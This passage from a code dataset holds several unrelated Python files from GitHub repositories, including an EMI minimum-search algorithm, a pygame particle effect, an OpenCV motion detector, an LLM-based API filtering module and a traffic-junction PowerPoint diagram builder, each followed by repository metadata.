and use \n\"detection_preprocess_list\" arrays to check if current rectangular area \nmeets the EMI requirement. In other words, if the area meets the EMI \nrequirement, the function calculates the average EMI value for that area and \nchecks if it is the current lowest average EMI value. If it is, the function \nupdates the current lowest average EMI values and records the coordinates of \nthe current rectangular area.\n\nFinally, the function returns a list containing three lowest average EMI value \nand the coordinates of these areas.\n\n\nInput clarification:\ncondensed_data: a 2D array with EMI measurement of the target room.\nl: an integer that shows the length of the wanted rectangular area.\nw: an integer that shows the width of the wanted rectangular area.\nh: an integer that shows the height of the wanted rectangular area.\nEMI_max: maximum EMI allowed for safely operate the device.\n\nOutput clarification:\nThe function will return a tuple containing least_avg_val and least_avg_coord\nleast_avg_val_list: a list of the three least average EMI in the target room\nleast_avg_coord : a list of three ranked least average EMI location \nEach components in the list is a tuple contains 6 integer. \n- The first two integers shows the coordinates of the top left corner of the \n wanted rectangular area.\n- The third and fourth integer shows the coordinates of the bottom right corner\n of the wanted rectangular area.\n'''\nimport math\nimport numpy as np\n\nfrom virtualscanner.EMI_Scanner.emi_measurement_class import emi_measurement\n\n# this algorith uses 3D prefix sum\ndef search_algorithm (condensed_data, l, w, h, EMI_max):\n least_avg_val_list = [math.inf, math.inf, math.inf]\n least_avg_coord = [(-1,-1,-1,-1,-1,-1),\n (-1,-1,-1,-1,-1,-1),\n (-1,-1,-1,-1,-1,-1)]\n total_num_points = l * w * h\n\n # Preprocessing the data\n # list to calculate the sum\n sum_preprocess_list = []\n # list to detect EMI requirement\n detection_preprocess_list =[]\n\n # define the two list\n for i in range (len(condensed_data)):\n temp_one_layer_array_1 = []\n temp_one_layer_array_2 = []\n for j in range (len(condensed_data[i])):\n temp_list_1 = []\n temp_list_2 = []\n for k in range (len(condensed_data[i][j])):\n temp_list_1.append(None)\n temp_list_2.append(None)\n temp_one_layer_array_1.append(temp_list_1)\n temp_one_layer_array_2.append(temp_list_2)\n sum_preprocess_list.append(temp_one_layer_array_1)\n detection_preprocess_list.append(temp_one_layer_array_2)\n\n for i in range (len(condensed_data)):\n for j in range (len(condensed_data[i])):\n for k in range (len(condensed_data[i][j])):\n s1 = sum_preprocess_list[i-1][j-1][k-1]\n s2 = sum_preprocess_list[i-1][j-1][k]\n s3 = sum_preprocess_list[i-1][j][k-1]\n s4 = sum_preprocess_list[i-1][j][k]\n s5 = sum_preprocess_list[i][j-1][k-1]\n s6 = sum_preprocess_list[i][j-1][k]\n s7 = sum_preprocess_list[i][j][k-1]\n s8 = condensed_data[i][j][k]\n \n d1 = detection_preprocess_list[i-1][j-1][k-1]\n d2 = detection_preprocess_list[i-1][j-1][k]\n d3 = detection_preprocess_list[i-1][j][k-1]\n d4 = detection_preprocess_list[i-1][j][k]\n d5 = detection_preprocess_list[i][j-1][k-1]\n d6 = detection_preprocess_list[i][j-1][k]\n d7 = detection_preprocess_list[i][j][k-1]\n d8 = 0\n if condensed_data[i][j][k].get_magnitude() > EMI_max: \n d8 = 1\n \n if i == 0: \n s1 = s2 = s3 = s4 = emi_measurement(0,0,0)\n d1 = d2 = d3 = d4 = 0\n if j == 0: \n s1 = s2 = s5 = s6 = emi_measurement(0,0,0)\n d1 = d2 = d5 = d6 = 0\n if k == 0: \n s1 = s3 = s5 = s7 = emi_measurement(0,0,0)\n d1 = d3 = d5 = d7 = 0\n \n sum_preprocess_list[i][j][k] = (s8 + s1 - s2 - s3\n + s4 - s5 + s6 + s7)\n\n # determine if the current point meets the EMI requirement.\n \n detection_preprocess_list[i][j][k] = (d8 + d1 - d2 - d3 + d4 \n - d5 + d6 + d7)\n \n # Find least_average_EMI_position\n iteration = 0\n while (iteration < 2):\n for i in range (len(condensed_data)): \n for j in range (len(condensed_data[0])):\n for k in range (len(condensed_data[0][0])):\n if not (i >= l - 1 and j >= w - 1 and k >= h - 1): continue \n s1 = sum_preprocess_list[i-l][j-w][k-h]\n s2 = sum_preprocess_list[i-l][j-w][k]\n s3 = sum_preprocess_list[i-l][j][k-h]\n s4 = sum_preprocess_list[i-l][j][k]\n s5 = sum_preprocess_list[i][j-w][k-h]\n s6 = sum_preprocess_list[i][j-w][k]\n s7 = sum_preprocess_list[i][j][k-h]\n s8 = sum_preprocess_list[i][j][k]\n \n d1 = detection_preprocess_list[i-l][j-w][k-h]\n d2 = detection_preprocess_list[i-l][j-w][k]\n d3 = detection_preprocess_list[i-l][j][k-h]\n d4 = detection_preprocess_list[i-l][j][k]\n d5 = detection_preprocess_list[i][j-w][k-h]\n d6 = detection_preprocess_list[i][j-w][k]\n d7 = detection_preprocess_list[i][j][k-h]\n d8 = detection_preprocess_list[i][j][k]\n \n if i < l: \n s1 = s2 = s3 = s4 = emi_measurement(0,0,0)\n d1 = d2 = d3 = d4 = 0\n if j < w: \n s1 = s2 = s5 = s6 = emi_measurement(0,0,0)\n d1 = d2 = d5 = d6 = 0\n if k < h: \n s1 = s3 = s5 = s7 = emi_measurement(0,0,0)\n d1 = d3 = d5 = d7 = 0\n\n current_detection = d8 - d1 + d2 + d3 - d4 + d5 - d6 - d7\n \n # Calculate the average EMI if nessary\n if not current_detection:\n # Calculate current average\n c_a = (s8 - s1 + s2 + s3 - s4 + s5 \n - s6 - s7) / total_num_points\n for m in range (len(least_avg_val_list)):\n if (c_a.get_magnitude() < least_avg_val_list[m]):\n least_avg_val_list[m] = c_a.get_magnitude()\n least_avg_coord[m] = (i - l + 1, j - w + 1,\n k - h + 1, i, j, k)\n break\n # flip length and width\n temp = w\n w = l\n l = temp\n iteration += 1\n \n return (least_avg_val_list, least_avg_coord) \n\n","repo_name":"qihenry/test4","sub_path":"virtualscanner/EMI_Scanner/least_emi_algorithm.py","file_name":"least_emi_algorithm.py","file_ext":"py","file_size_in_byte":8298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43405082197","text":"import pygame, OpenGL, math, random\nfrom pygame.locals import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom time import time\n\ngravity = 80\n\nclass Particle:\n def __init__(self, x, y, ttl, color):\n self.x = x\n self.y = y\n self.z = 0\n self.ttl = ttl\n self.speedX = random.randint(-85, 85)\n self.speedY = random.randint(250, 300)\n self.timeAlive = 0\n self.startTime = time() + random.randint(0, 400)/100\n self.color = color\n \n def getPosition(self):\n global gravity\n x = self.x + self.speedX * self.timeAlive\n y = self.y - self.speedY * self.timeAlive + gravity * self.timeAlive * self.timeAlive\n return x, y\n \n def update(self, t):\n self.timeAlive = time() - self.startTime\n \n def isAlive(self):\n return self.timeAlive < self.ttl\n \nclass ParticleSystem:\n def __init__(self, x, y, z, n, ttl, color):\n self.x = x\n self.y = y\n self.z = z\n self.particles = [Particle(x, y, ttl, color) for _ in range(n)]\n \n def getParticles(self):\n return self.particles\n \ndef resetView():\n glLoadIdentity()\n gluPerspective(45, 1, 0.05, 100)\n glTranslatef(0,0,-5)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n\n#---------------------------------------------------- \n \npygame.init()\nscreen = pygame.display.set_mode((600,600))\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\nsurfaceSize = (50, 50)\n\n#Circle particle\ncircle = pygame.Surface(surfaceSize)\ncircle.set_colorkey(BLACK)\n\n#Particle texture\nimage = pygame.Surface(surfaceSize, pygame.SRCALPHA, 32)\nimage = image.convert_alpha()\ntexture = pygame.image.load(\"vulcano.png\").convert_alpha()\ntexture = pygame.transform.scale(texture,(100, 100))\ntexture_rect = texture.get_rect()\ntexture_rect.center = (325, 450)\nscreen.blit(texture, texture_rect)\n\nparticleSize = 6\nttl = 3\nnumberOfParticles = 1000\nsysPos = (300, 400, 0)\n\nparticleSystem = ParticleSystem(sysPos[0], sysPos[1], sysPos[2], numberOfParticles, ttl, WHITE)\n\nwhile True:\n now = time()\n screen.fill(WHITE)\n screen.blit(texture,texture_rect)\n resetView()\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n \n for i in range(numberOfParticles):\n particle = particleSystem.getParticles()[i]\n \n if (particle.startTime < now):\n particle.update(time())\n \n if (particle.isAlive()):\n x, y = particle.getPosition()\n \n color = particle.color\n if (color[2] > 2):\n color = (color[0], color[1], color[2]-3)\n if (color[1] > 1):\n color = (color[0], color[1]-2, color[2])\n if (color[0] > 0):\n color = (color[0]-1, color[1], color[2])\n particle.color = color\n \n #screen.blit(texture, (x,y))\n pygame.draw.circle(circle, particle.color, (25, 25), particleSize)\n screen.blit(circle, (x, y))\n else:\n particleSystem.particles[i] = Particle(sysPos[0], sysPos[1], ttl, WHITE)\n\n pygame.display.flip()\n pygame.time.wait(10)\n \n \n \n \n \n","repo_name":"connectthefranky/RacunalnaGrafinka","sub_path":"lab2/particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34036675682","text":"#%%\nnum = list(map(int, input('값을 입력하시오 : ').split()))\nnum\n\n\n\n#%%\ndef arithmetic_sequence(target_num:int):\n import numpy as np\n \n for num in range(1, target_num+1):\n num_list = np.arange(1, num)\n list_sum = sum(num_list[:])\n\n if list_sum == target_num:\n return True\n if list_sum < target_num:\n continue\n else:\n return False\n\nprint(arithmetic_sequence())\n\n\n\n\n\n\n#%%\n\n\n\n","repo_name":"CatsSaveTheWorld/TIL","sub_path":"algorithms/baekjoon/10818_최대최소/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29934570767","text":"\ndef split(txt):\n result = []\n open_count = 0\n closed_count = 0\n \n subset = \"\"\n \n for char in txt:\n if char == \"(\":\n subset += \"(\"\n open_count += 1\n if char == \")\":\n subset += \")\"\n closed_count += 1\n if closed_count == open_count:\n result.append(subset)\n subset = \"\"\n \n return result\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"Fpymv2HieqEd7ptAq_11.py","file_name":"Fpymv2HieqEd7ptAq_11.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9127587637","text":"# 괄호 변환\n# 올바른 문자열인지 판단\ndef isRight(p):\n stack = []\n for i in p:\n if i == \"(\":\n stack.append(i)\n else:\n if not stack: return False\n stack.pop()\n if not stack: return True\n return False\ndef solution(p):\n if p == '': return ''\n # 2\n left = 0\n right = 0\n u = ''\n v = ''\n for i in range(len(p)):\n if p[i] == '(':\n left += 1\n else:\n right += 1\n if left == right:\n u = p[:i+1]\n v = p[i+1:]\n break\n if isRight(u):\n return u + solution(v)\n else:\n temp = '('\n temp += solution(v)\n temp += ')'\n for i in u[1:-1]:\n if i == '(':\n temp += ')'\n elif i == ')':\n temp += '('\n return temp\nprint(solution(\"()))((()\"))","repo_name":"mog-hi/BOJ_Python","sub_path":"Programmers/kakao/60058.py","file_name":"60058.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"151474678","text":"import cv2\nimport numpy as np\n\n# Create video capture object\n# https://www.youtube.com/watch?v=fe9-qz3jsgs (freeway1.mp4)\ncap = cv2.VideoCapture(\"freeway1.mp4\")\nker = None\nbackground = cv2.createBackgroundSubtractorMOG2(detectShadows = True)\n\nwhile True:\n # Analyze frame by frame\n _, first_frame = cap.read()\n _, last_frame = cap.read()\n\n surface_mask = background.apply(first_frame)\n _, surface_mask = cv2.threshold(surface_mask, 250, 255, cv2.THRESH_BINARY)\n surface_mask = cv2.erode(surface_mask, ker, iterations = 1)\n surface_mask = cv2.dilate(surface_mask, ker, iterations = 2)\n \n # Compute the absolute difference between two frames\n diff = cv2.absdiff(first_frame, last_frame)\n\n # Convert the frame to grayscale\n diff_gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\n # Apply blurness to smoothen the frame\n diff_blur = cv2.GaussianBlur(diff_gray, (5, 5), 0)\n\n # Apply a threshold to highlight the moving pixels\n _, threshold_bin = cv2.threshold(diff_blur, 20, 255, cv2.THRESH_BINARY)\n\n # Find contours in the threshold image\n contours, hierarchy = cv2.findContours(threshold_bin, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw the rectangle box\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n if cv2.contourArea(cnt) > 300:\n cv2.rectangle(first_frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n # Put text on each grounding box\n cv2.putText(first_frame, 'Motion Detected', (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2, cv2.LINE_AA)\n \n surface_masked = cv2.bitwise_and(first_frame, first_frame, mask=surface_mask)\n # Combine the detected and the mask frame\n all_frame = np.hstack((first_frame, surface_masked))\n\n # Display the output frames and compare them side by side\n cv2.imshow(\"Motion Detector and Mask\", cv2.resize(all_frame, None, fx=0.5, fy=0.5))\n \n #Press 'ESC' key to exit\n if cv2.waitKey(10) == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows() \n","repo_name":"ricky51351/Python_Projects","sub_path":"motion_detector.py","file_name":"motion_detector.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3693553522","text":"import json, os, re\nfrom base_graph_ast import *\n\nfrom configs.model_config import *\nfrom model.model import *\nfrom prompt.prompt import *\n\nclass JSONFilter:\n \"\"\"\n Initializes a JSON filter class with a strategy\n \"\"\"\n def __init__(self, strategy):\n self.strategy = strategy\n\n def set_strategy(self, strategy):\n self.strategy = strategy\n\n def filter_keys(self, json_data):\n return self.strategy.filter_keys(json_data)\n\nclass NonUnderscoreFilterStrategy:\n \"\"\"\n Remove keys that start with an underscore.\n \"\"\"\n def filter_keys(self, json_data):\n filtered_data = {}\n for key, value in json_data.items():\n if not key.startswith('_'):\n filtered_data[key] = value\n return filtered_data\n\nclass IndegreeSortFilterStrategy:\n \"\"\"\n Remove keys with indegrees above a threshold by loading precomputed indegree values from a JSON file.\n \"\"\"\n def __init__(self):\n compute_degree_graph()\n with open(os.path.join(LIB_ANALYSIS_PATH,'sorted_nodes.json'), 'r') as file:\n self.indegree_json = json.load(file)\n print('sorted_nodes.json loaded succesfully!')\n \n def filter_keys(self, json_data, indegree_threshold=10):\n filtered_data = {}\n for key in json_data:\n if key in self.indegree_json and self.indegree_json[key]['in_degree'] <= indegree_threshold:\n filtered_data[key] = json_data[key]\n return filtered_data\n\nclass StrContainFilterStrategy:\n \"\"\"\n Filters keys shown in the content\n \"\"\"\n def filter_keys(self, json_data, content):\n filtered_data = {}\n for key, value in json_data.items():\n if key in content:\n filtered_data[key] = value\n return filtered_data\n\nclass WebAPIFilterStrategy:\n \"\"\"\n Filters keys appeared in web API\n \"\"\"\n def __init__(self, ):\n # load html, groundtruth\n content = process_html(API_HTML_PATH)\n # process APIs\n ori_content_keys = list(set([i for i in content.split(' ') if (LIB_ALIAS in i) and ('.' in i) and (not i.split('.')[-1].isupper())]))# \n self.web_API = {}\n for item in ori_content_keys:\n key = item.split(\".\")[-1]\n if key not in self.web_API:\n self.web_API[key] = []\n self.web_API[key].append(item)\n\n def filter_keys(self, json_data):\n filtered_data = {}\n for key, value in json_data.items():\n if key in self.web_API:\n filtered_data[key] = value\n return filtered_data\n\nclass LLMFilterStrategy:\n \"\"\"\n Use LLM to find API answer with given function keyword\n \"\"\"\n def __init__(self, ):\n # Read the JSON data\n with open(os.path.join(LIB_ANALYSIS_PATH,'API_func.json'), 'r') as f:\n data = json.load(f)\n print(len(data),' func detected!')\n\n strategy = IndegreeSortFilterStrategy() \n json_filter = JSONFilter(strategy)\n filtered_data = json_filter.filter_keys(data)\n print('After step1, ', len(filtered_data),' func detected!')\n\n # load index html\n content = process_html(API_HTML_PATH)\n self.content_list = split_string_with_limit(content, limit=500)\n print('split html content into ', len(content_list), ' contents!')\n # Step2: check if item is in html\n strategy = StrContainFilterStrategy() \n json_filter = JSONFilter(strategy)\n self.filtered_data = json_filter.filter_keys(filtered_data)\n print('After step2, ', len(filtered_data),' func detected!')\n \n # LLM and prompt\n self.llm, self.tokenizer = LLM_model()\n self.chat_prompt = Factory_prompt_json(\"askfullAPI\")\n \n def filter_keys(self, json_data):\n \"\"\"\n Filters keys present in LLM data from the input json data\n \"\"\"\n self.run_llm()\n LLM_data = self.clean_from_llmanswer(self.answer_api_available)\n # assume LLM_data is True here\n filtered_data = {}\n for key, value in json_data.items():\n if key in LLM_data:\n filtered_data[key] = value\n return filtered_data\n \n def run_llm(self,):\n \"\"\"\n Runs LLM API for each data and stores the output in a JSON file\n \"\"\"\n all_func = list(self.filtered_data.keys())\n self.answer_api_available = {}\n for key in all_func:\n self.answer_api_available[key] = []\n for content in self.content_list:\n if key not in content:\n continue\n kwargs = {\"API\":key,\"content\":content}\n print(f'Can you help to find the full command of keyword {key}?')\n response, history = LLM_response(self.llm,self.tokenizer,self.chat_prompt,history=[],kwargs=kwargs)\n print('Agent:',response)\n self.answer_api_available[key].append(response)\n with open(os.path.join(LIB_ANALYSIS_PATH,'askLLM_API.json'), 'w') as f:\n json.dump(self.answer_api_available, f, indent=4)\n \n def clean_from_llmanswer(self,json_data):\n \"\"\"\n Removes data with keywords of same key name from json data\n \"\"\"\n LLM_data = {}\n for key, value_list in json_data.items():\n filtered_list = []\n for value in value_list:\n content = value.split('[')[-1].split(']')[0].strip()\n last_token = content.split('.')[-1]\n if last_token == key:\n filtered_list.append(value)\n if filtered_list:\n filtered_data[key] = filtered_list\n return LLM_data\n\ndef process_html(html_path):\n \"\"\"\n Loads HTML file content after removing excessive spaces.\n \"\"\"\n webcontent = BSHTMLLoader(html_path).load()\n content = ' '.join([i.page_content for i in webcontent])\n # To remove large blocks of whitespace without removing spaces between words, ensuring the shortest possible input for LLM.\n content = re.sub(r'\\s+', ' ', content)\n return content\n\ndef split_string_with_limit(string, limit):\n \"\"\"\n # Splits a string into chunks of words not exceeding the limit length\n \"\"\"\n words = string.split()\n chunks = []\n current_chunk = \"\"\n current_count = 0\n for word in words:\n if current_count + len(word) > limit:\n chunks.append(current_chunk.strip())\n current_chunk = \"\" \n current_count = 0\n current_chunk += word + \" \"\n current_count += len(word) + 1\n if current_chunk:\n chunks.append(current_chunk.strip())\n return chunks\n\n\nif __name__=='__main__':\n # test\n # load json\n with open(os.path.join(LIB_ANALYSIS_PATH,'API_func.json'), 'r') as file:\n data = json.load(file)\n strategy = IndegreeSortFilterStrategy() \n json_filter = JSONFilter(strategy)\n filtered_data = json_filter.filter_keys(data)\n # save json\n with open(os.path.join(LIB_ANALYSIS_PATH,'API_func_filtered.json'), 'w') as file:\n file.write(json.dumps(filtered_data, indent=4))\n","repo_name":"batmen-lab/BioMANIA","sub_path":"src/dataloader/utils/extract_filter_from_function.py","file_name":"extract_filter_from_function.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35883180454","text":"from pptx.dml.color import RGBColor\nfrom pptx.enum.lang import MSO_LANGUAGE_ID\nfrom pptx.enum.text import MSO_AUTO_SIZE\nfrom pptx.util import Pt\n\nfrom Building_Diagram import *\nfrom Directions import *\nfrom General_Info import *\nfrom ID import ID\nfrom LRT_Info import *\n\n\nclass Diagram:\n \"\"\"\n A class used to represent all the info about the junction that is needed for creating the Diagram presentation file.\n \"\"\"\n\n def __init__(self):\n \"\"\" The constructor of the Diagram class,called when a new instance of a class is created.\n To initialize, it needs the output of Phaser and the info from the excel\"\"\"\n self.__North = Direction(\n \"North\") # A property representing the north direction. Initialized with the name \"North\"\n self.__South = Direction(\n \"South\") # A property representing the south direction. Initialized with the name \"South\"\n self.__East = Direction(\"East\") # A property representing the east direction. Initialized with the name \"East\"\n self.__West = Direction(\"West\") # A property representing the west direction. Initialized with the name \"West\"\n self.__GenInfo = General_Info() # A property representing general info about the junction.\n self.__LRTInfo = LRT_Info() # A property representing LRT info about the junction.\n self.__InfoFromPhaser = \"\" # A class that holds the output from Phaser. That is the data the will be pushed to\n # the different class in Diagram and Table.\n self.__IdInfo = ID() # A list with info about the creator of the volume_calculator excel file. It is\n # used in the ID file\n self.__OutputFolder = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n\n @property\n def NO(self):\n \"\"\"Get the north info\"\"\"\n return self.__North\n\n @NO.setter\n def NO(self, value):\n \"\"\"Set the north info\"\"\"\n self.__North = value\n\n @property\n def SO(self):\n \"\"\"Get the south info\"\"\"\n return self.__South\n\n @SO.setter\n def SO(self, value):\n \"\"\"Set the south info\"\"\"\n self.__South = value\n\n @property\n def EA(self):\n \"\"\"Get the east info\"\"\"\n return self.__East\n\n @EA.setter\n def EA(self, value):\n \"\"\"Set the east info\"\"\"\n self.__East = value\n\n @property\n def WE(self):\n \"\"\"Get the west info\"\"\"\n return self.__West\n\n @WE.setter\n def WE(self, value):\n \"\"\"Set the north info\"\"\"\n self.__West = value\n\n @property\n def G_INF(self):\n \"\"\"Get the general info\"\"\"\n return self.__GenInfo\n\n @G_INF.setter\n def G_INF(self, value):\n \"\"\"Set the general info\"\"\"\n self.__GenInfo = value\n\n @property\n def LRT_INF(self):\n \"\"\"Get the LRT info\"\"\"\n return self.__LRTInfo\n\n @LRT_INF.setter\n def LRT_INF(self, value):\n \"\"\"Set the LRT info\"\"\"\n self.__LRTInfo = value\n\n @property\n def phsr_lst(self):\n \"\"\"Get the phaser list info\"\"\"\n return self.__InfoFromPhaser\n\n @phsr_lst.setter\n def phsr_lst(self, value):\n \"\"\"Set the phaser list info\"\"\"\n self.__InfoFromPhaser = value\n\n @property\n def ID(self):\n \"\"\"Get the excel properties of the current JUNC\"\"\"\n return self.__IdInfo\n\n @ID.setter\n def ID(self, value):\n \"\"\"Set the excel properties of the current JUNC\"\"\"\n self.__IdInfo = value\n\n @property\n def OUTPUT(self):\n \"\"\"Get the output path of the final JUNC\"\"\"\n return self.__OutputFolder\n\n @OUTPUT.setter\n def OUTPUT(self, destination_path):\n \"\"\"Set the output path of the final JUNC\"\"\"\n self.__OutputFolder = destination_path\n\n def push_arr(self):\n \"\"\"the method uses the output arrows of Phaser to push them into the right subclass of each direction,\n divided to regular arrows and public transport arrows. \"\"\"\n arr_list = [self.phsr_lst.ARROW_REG, self.phsr_lst.ARROW_PT]\n orig_lanes = [\"R\", \"TR\", \"T\", \"TL\", \"L\", \"A\", \"RL\"]\n directions = [self.NO.LAN, self.SO.LAN, self.EA.LAN, self.WE.LAN]\n\n for direc in directions:\n for lan in orig_lanes:\n if arr_list[0]:\n cur_arrow_input = [arr_list[0][0], arr_list[1][0]]\n if lan == \"R\":\n SR_cur_arrow_input = [0, 0]\n if arr_list[0][0] == 9:\n SR_cur_arrow_input[0] = 1\n cur_arrow_input[0] = 0\n if arr_list[1][0] == 9:\n SR_cur_arrow_input[1] = 1\n cur_arrow_input[1] = 0\n if sum(SR_cur_arrow_input) > 0:\n setattr(direc, \"SR\", SR_cur_arrow_input)\n setattr(direc, lan, cur_arrow_input)\n arr_list[0].pop(0)\n arr_list[1].pop(0)\n\n def push_vol(self):\n \"\"\"the method uses the output volumes of Phaser to push them into the right subclass of each direction,\n divided to morning and evening\"\"\"\n vol_list = [self.phsr_lst.MOR_VOL, self.phsr_lst.EVE_VOL]\n directions_mor = [self.NO.MOR, self.SO.MOR, self.EA.MOR, self.WE.MOR]\n directions_eve = [self.NO.EVE, self.SO.EVE, self.EA.EVE, self.WE.EVE]\n count = -1\n\n for vol in vol_list:\n count += 1\n if count == 0:\n directions = directions_mor\n else:\n directions = directions_eve\n for direc in directions:\n routes = [\"R\", \"T\", \"L\"]\n for rou in routes:\n if vol:\n value_to_push = int(vol[0])\n setattr(direc, rou, value_to_push)\n vol.pop(0)\n\n def push_general_info(self):\n \"\"\"the method uses the output general information of Phaser to push it into G_INF subclass and to each\n matching property in that subclass. For specific info that related to the LRT, it pushes it to LRT_INF \"\"\"\n phaser_gen_info_list = self.phsr_lst.GEN_INFO\n info_list = [self.G_INF, self.LRT_INF]\n inf_counter = 0\n lrt_types = [0, 0]\n info_types = [\"CAP\", \"NLSL\", \"ELWL\", \"IMG5\", \"IMG6\", \"GEONS\", \"GEOEW\", \"LOOP\", \"LRT_Orig\", \"LRT_Orig\",\n \"INF\"]\n while inf_counter < len(info_types):\n\n if inf_counter == 8 or inf_counter == 9:\n curr_inf = info_list[1]\n lrt_types[inf_counter - 8] = phaser_gen_info_list[inf_counter]\n data_to_push = lrt_types\n else:\n curr_inf = info_list[0]\n data_to_push = phaser_gen_info_list[inf_counter]\n setattr(curr_inf, info_types[inf_counter], data_to_push)\n inf_counter += 1\n self.LRT_INF.lrt_orig_to_dir()\n\n def push_lrt_info(self):\n \"\"\"the method uses the output LRT information of Phaser to push it into LRT_INF subclass and to each\n matching property in that subclass.\"\"\"\n phaser_lrt_info_list = self.phsr_lst.LRT_INFO\n phaser_lrt_info_list.pop(0)\n lrt_info_types = [\"CYC_TIME\", \"LRT_LOST_TIME\", \"LRT_HDWAY\", \"LRT_MCU\", \"GEN_LOST_TIME\"]\n for i, lrt_inf in enumerate(lrt_info_types):\n setattr(self.LRT_INF, lrt_inf, phaser_lrt_info_list[i])\n\n def push_street_names(self):\n \"\"\"the method uses the output street names of Phaser to push it into phsr_lst subclass and to the\n matching property in that subclass (STREET).\"\"\"\n phaser_street_names_list = self.phsr_lst.STREETS\n dir_list = {\"NO\": self.NO, \"SO\": self.SO, \"EA\": self.EA, \"WE\": self.WE}\n dir_keys = list(dir_list.keys())\n for cur_dir in dir_keys:\n the_dir = dir_list[cur_dir]\n the_name = phaser_street_names_list[dir_keys.index(cur_dir)]\n setattr(the_dir, \"NAME\", the_name)\n\n def get_type_of_junc_for_choosing_slide(self):\n \"\"\"This method checks about each direction in the junction whether it's empty or not (empty: no lanes or\n volumes); It creates a string that is later translated into a type of junction +,⊢,⊤,⊣,⊥ The method also\n checks for LRT in the junction (and it's direction), and for a metro around the junction. The method returns a\n number that matches the info about the junction and represents a matching slide in the diagrams template\n file. If the junction contains only three directions, the method updates a property that later will be\n used for the oneway function.\n \"\"\"\n north = str(self.NO.empty_direction())\n south = str(self.SO.empty_direction())\n east = str(self.EA.empty_direction())\n west = str(self.WE.empty_direction())\n dir_exist = north + south + east + west\n types = {'1111': 1, '1110': 2, '0111': 3, '1101': 4, '1011': 5}\n if self.LRT_INF.LRT_Dir > 0:\n lrt_type = 1\n else:\n lrt_type = 0\n if self.LRT_INF.Metro_Dir > 0:\n metro_type = 2\n else:\n metro_type = 0\n junc_type = metro_type * 5 + lrt_type * 5 + types[dir_exist]\n if types[dir_exist] > 1:\n self.G_INF.ONEWAY = types[dir_exist]\n return junc_type\n\n def add_street_name_and_lrt(self, pres):\n \"\"\"The method goes through all the shapes in Diagram pptx file and checks if it represents a direction\n name; It adds the matching name to each street, based on the name property of each direction. If the junction\n has lrt, the method adds the direction of the lrt. If the junction has only 3 direction, the method calls\n 'is_oneway' method, to check if it's a oneway street\n \"\"\"\n\n street_placeholders = {\"NORTH_NAME\": self.NO.NAME, \"SOUTH_NAME\": self.SO.NAME, \"EAST_NAME\": self.EA.NAME,\n \"WEST_NAME\": self.WE.NAME, \"RAKAL\": self.LRT_INF.LRT_Dir}\n lrt_type_to_string = {0: \"\", 1: \"צפון ⇋ דרום\", 2: \"מזרח ⇋ מערב\", 3: \"צפ ⇋ דר, מז ⇋ מע\"}\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in street_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n text_frame.word_wrap = True\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n if shape.name == \"RAKAL\":\n text_frame = shape.text_frame\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = False\n font.size = Pt(18)\n font.color.rgb = RGBColor(228, 223, 211)\n font.language_id = MSO_LANGUAGE_ID.HEBREW\n text_frame.text_wrap = True\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n text_frame.text_wrap = True\n font.name = 'Assistant'\n run.text = str(lrt_type_to_string[street_placeholders[shape.name]])\n else:\n text_frame = shape.text_frame\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = True\n font.size = Pt(24)\n font.language_id = MSO_LANGUAGE_ID.HEBREW\n font.color.rgb = RGBColor(89, 89, 89)\n font.name = 'Assistant'\n if street_placeholders[shape.name] == 0:\n run.text = \"\"\n else:\n run.text = str(street_placeholders[shape.name])\n text_frame.text_wrap = True\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n if self.G_INF.ONEWAY > 1:\n self.is_oneway(pres)\n pres.save(\"Street_Diagram.pptx\")\n\n def add_morning_volumes(self, pres):\n \"\"\"\n The method goes through all the shapes in Diagram pptx file and checks if it represents a volume of the\n morning counts; It adds the matching volume to each direction, based on the route property of each direction(\n L,T,R).\n \"\"\"\n\n volume_placeholders = {\"NORTH_MOR_R\": self.NO.MOR.R, \"NORTH_MOR_T\": self.NO.MOR.T, \"NORTH_MOR_L\": self.NO.MOR.L,\n \"SOUTH_MOR_R\": self.SO.MOR.R, \"SOUTH_MOR_T\": self.SO.MOR.T, \"SOUTH_MOR_L\": self.SO.MOR.L,\n 